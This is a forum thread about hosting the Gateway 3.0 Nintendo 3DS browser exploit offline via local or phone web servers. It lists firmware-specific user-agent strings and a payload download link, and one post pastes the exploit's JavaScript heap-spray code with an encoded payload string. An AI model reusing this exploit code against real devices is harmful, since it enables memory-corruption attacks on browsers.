Hacking [Attempt] Running GW3.0 Web Exploit on a Local Network

[Shadowtrance]

Well study some 3ds html instead and put the physics away. haha

 

[felystar]

Its offline, you could also use your mobile hosting theese files if you are not @ home

I guess I would have to create a network with my mobile and share it to my 3DS, right?

Well study some 3ds html instead and put the physics away. haha

I'll be doing that right when I finish the unit. That's for sure

 

[Arkansaw]

what's with the dat files? just put all of them in root?

 

[Shadowtrance]

what's with the dat files? just put all of them in root?

Yeah i just left them in the folder (or root or wherever you've got them on your local server, got mine in a folder called gw) with the html files and it works.

 

[liomajor]

dat files are not needed, i took only index.php and frame.html to execute exploit.

 

[shinyquagsire23]

I might try and see if I can't make an Android app which just lets you choose the sysNAND firmware and then start up a small file server + ad-hoc network where you can go to with your 3DS. Would be good in case you have to start it up on the go.

 

[azza900]

I might try and see if I can't make an Android app which just lets you choose the sysNAND firmware and then start up a small file server + ad-hoc network where you can go to with your 3DS. Would be good in case you have to start it up on the go.

Oh, Please do. You would become a lifesaver.

 

[liomajor]

androPHP is free of charge and works brilliant

 

[azza900]

androPHP is free of charge and works brilliant

I would \try but honestly i wouldnt know where to start

 

[bendrr]

the region doesn't matter, i made a simple c# app to download all of the different payloads and only the version string matters.

fw 2.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7412.US"
fw 2.1-3.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7498.US"
fw 4.0-4.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7455.US"
fw 5.0-7.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7552.US"
fw 7.1-9.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US"

so there are 5 different payloads.
here the payloads in html and as binary dat:
http://www.mediafire.com/download/2pd0p3htica8c4n/gateway30_payloads.7z

that's it, you are the shit! thanks

 

[Cyan]

the .dat file is not needed.
the .dat file is only an easy way to look at the payload in binary form, it contains the decrypted string located in the javascript code

unescape("blablablablabla_I'm an encrypted payload_blablabla").

The 3DS browser only loads the javascript, not the .dat


The ability to load the exploit on offline mode would be even better (when you are on a trip, etc.)
That's probably what 4.5 downgrade feature is for, as 4.5 MSET exploit is still usable with gateway3.0

 

[dontay0100]

I've been doing the same thing, haven't tested the code yet but heres the source i got?

 

[dontay0100]

<html>
<head>
<style>
body {
color:white;
background:black;
}


</style>
<script>
function magicfun(mem, size, v) {
var a = new Array(size - 20);
nv = v + unescape("%ucccc");
for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));

mem.push(t);
}

function dsm(evnt) {
var mem = [];

for (var j = 20; j < 430; j++) {
magicfun(mem, j, unescape("\u0000\u08e0\u0004\u08e0\u0008\u08e0\u000c\u08e0\u0010\u08e0\u0014\u08e0\u0018\u08e0\u001c\u08e0\u0020\u08e0\u0024\u08e0\u0028\u08e0\u002c\u08e0\u0030\u08e0\u0034\u08e0\u0038\u08e0\u003c\u08e0\u0040\u08e0\u0044\u08e0\u0048\u08e0\u004c\u08e0\u0050\u08e0\u0054\u08e0\u0058\u08e0\u005c\u08e0\u0060\u08e0\u0064\u08e0\u0068\u08e0\u006c\u08e0\u0070\u08e0\u0074\u08e0\u0078\u08e0\u007c\u08e0\u0080\u08e0\u0084\u08e0\u0088\u08e0\u008c\u08e0\u0090\u08e0\u0094\u08e0\u0098\u08e0\u009c\u08e0\u00a0\u08e0\u00a4\u08e0\u00a8\u08e0\u00ac\u08e0\u00b0\u08e0\u00b4\u08e0\u00b8\u08e0\u00bc\u08e0\u00c0\u08e0\u00c4\u08e0\u00c8\u08e0\u00cc\u08e0\u00d0\u08e0\u00d4\u08e0\u00d8\u08e0\u00dc\u08e0\u00e0\u08e0\u00e4\u08e0\u00e8\u08e0\u00ec\u08e0\u00f0\u08e0\u00f4\u08e0\u00f8\u08e0\u00fc\u08e0\u0100\u08e0\u0104\u08e0\u0108\u08e0\u010c\u08e0\u0110\u08e0\u0114\u08e0\u0118\u08e0\u011c\u08e0\u0120\u08e0\u0124\u08e0\u0128\u08e0\u012c\u08e0\u0130\u08e0\u0134\u08e0\u0138\u08e0\u013c\u08e0\u0140\u08e0\u0144\u08e0\u0148\u08e0\u014c\u08e0\u0150\u08e0\u0154\u08e0\u0158\u08e0\u015c\u08e0\u0160\u08e0\u0164\u08e0\u0168\u08e0\u016c\u08e0\u0170\u08e0\u0174\u08e0\u0178\u08e0\u017c\u08e0\u0180\u08e0\u0184\u08e0\u0188\u08e0\u018c\u08e0\u0190\u08e0\u0194\u08e0\u0198\u08e0\u019c\u08e0\u01a0\u08e0\u01a4\u08e0\u01a8\u08e0\u01ac\u08e0\u01b0\u08e0\u01b4\u08e0\u01b8\u08e0\u01bc\u08e0\u01c0\u08e0\u01c4\u08e0\u01c8\u08e0\u01cc\u08e0\u01d0\u08e0\u01d4\u08e0\u01d8\u08e0\u01dc\u08e0\u01e0\u08e0\u01e4\u08e0\u01e8\u08e0\u01ec\u08e0\u01f0\u08e0\u01f4\u08e0\u01f8\u08e0\u01fc\u08e0"));
}
}
</script>
</head>
<body>
<h1 align="center">GATEWAY 3DS LOADING...</h1>
</body>
</html>

 

[Arkansaw]

can someone just bundle it into a cia or something locally accessible? (assuming the browser even access file://)

 

[Vappy]

(assuming the browser even access file://)

You assume wrong. The browser only has http and https, and doesn't have access to the SD card.

 

[liomajor]

The only thing that is missing, is a little bit scripting for detecting browser version to open different index.php.

I've to go now, maybe someone is faster than me and makes a better package including that.

androPHP is a good solution if you are not at home bcuz you can simply open a share to the files without the need for internet

 

[Duo8]

I just do this lol

 

[azza900]

The only thing that is missing, is a little bit scripting for detecting browser version to open different index.php.

I've to go now, maybe someone is faster than me and makes a better package including that.

androPHP is a good solution if you are not at home bcuz you can simply open a share to the files without the need for internet

Can right out a simple guide on how to host the files with androPHP.?

 

[gohan123]

I just started a web server on my android phone and connected it with mobile tethering. perfect mobile gateway solution until there is an easier solution. no need for real local network or mobile internet at all.

 

[Arkansaw]

You assume wrong. The browser only has http and https, and doesn't have access to the SD card.

well. worth a try at least